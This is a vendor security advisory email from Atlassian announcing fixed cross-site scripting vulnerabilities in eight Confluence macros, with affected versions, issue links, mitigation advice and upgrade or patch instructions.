We are writing to inform you of a number of newly-discovered security vulnerabilities in Confluence. These security vulnerabilities have a severity level of high. To fix these vulnerabilities, you should follow the instructions in the security advisory below. Enterprise Hosted customers should request an upgrade by raising a support request at
http://support.atlassian.com. JIRA Studio is not vulnerable to any of the issues described in this advisory.
Atlassian is committed to improving product security. The vulnerabilities listed in this advisory have been discovered by Atlassian, unless noted otherwise. The reporter may also have requested that we do not credit them.
For your convenience, we have included the entire security advisory in this email. To view the online version of this security advisory, please go to
http://confluence.atlassian.com/x/HgdrDQ.
If you have any questions or concerns about this security vulnerability or about our policy of disclosure of security vulnerabilities, please visit our page on Atlassian security policies (
http://confluence.atlassian.com/display/Support/Atlassian+Security+Policies) or raise a support request at
http://support.atlassian.com/.
*** Security Advisory ***
*XSS Vulnerabilities in Various Confluence Macros*
Severity -- Atlassian rates these vulnerabilities as high, according to the scale published in our documentation (
http://confluence.atlassian.com/display/DOC/Severity+Levels+for+Security+Issues). The scale allows us to rank a vulnerability as critical, high, moderate or low.
Risk Assessment -- We have identified and fixed a number of cross-site scripting (XSS) vulnerabilities which may affect Confluence instances, including publicly available instances (that is, internet-facing servers). XSS vulnerabilities potentially allow an attacker to embed their own JavaScript into a Confluence page. You can read more about XSS attacks at cgisecurity.com (
http://www.cgisecurity.com/articles/xss-faq.shtml), The Web Application Security Consortium (
http://projects.webappsec.org/Cross-Site+Scripting) and other places on the web.
Vulnerability -- The list below describes the Confluence macros and Confluence versions affected by the XSS vulnerabilities.
1) Vulnerability in Code macro, affecting Confluence 2.7 -- 3.4.
See issue
http://jira.atlassian.com/browse/CONF-21098.
2) Vulnerability in Attachments macro, affecting Confluence 3.3 -- 3.4.
See issue
http://jira.atlassian.com/browse/CONF-21099.
3) Vulnerability in Bookmarks macro, affecting Confluence 3.1 -- 3.4.3.
See issue
http://jira.atlassian.com/browse/CONF-21390.
4) Vulnerability in Global Reports macro, affecting Confluence 2.7 -- 3.4.3.
See issue
http://jira.atlassian.com/browse/CONF-21391.
5) Vulnerability in Recently Updated macro, affecting Confluence 3.0 - 3.4.3.
See issue
http://jira.atlassian.com/browse/CONF-21392.
6) Vulnerability in Pagetree macro, affecting Confluence 2.7 - 3.4.3.
See issue
http://jira.atlassian.com/browse/CONF-21393.
7) Vulnerability in Create Space Button macro, affecting Confluence 2.7 - 3.4.3.
See issue
http://jira.atlassian.com/browse/CONF-21394.
8) Vulnerability in Documentation Link macro, affecting Confluence 2.7 -- 3.4.5.
See issue
http://jira.atlassian.com/browse/CONF-21508.
Our thanks to dave b, who reported the vulnerability in the Documentation Link macro. We fully support the reporting of vulnerabilities and we appreciate it when people work with us to identify and solve the problem.
Risk Mitigation -- We recommend that you upgrade your Confluence installation to fix these vulnerabilities. Alternatively, if you are not in a position to upgrade immediately and you judge it necessary, you can disable public signup to your wiki until you have applied the necessary patch or upgrade. For even tighter control, you could restrict access to trusted groups.
Fix -- Confluence 3.4.6 fixes these issues. For a full description of this release, see the release notes (
http://confluence.atlassian.com/display/DOC/Confluence+3.4.6+Release+Notes). You can download the latest version of Confluence from the download centre (
http://www.atlassian.com/software/confluence/ConfluenceDownloadCenter.jspa).
Patches -- If for some reason you cannot upgrade to the latest version of Confluence, you can apply patches to fix the vulnerabilities described in this security advisory. The patches are attached to the relevant issues, as listed above.
Securely yours,
Atlassian
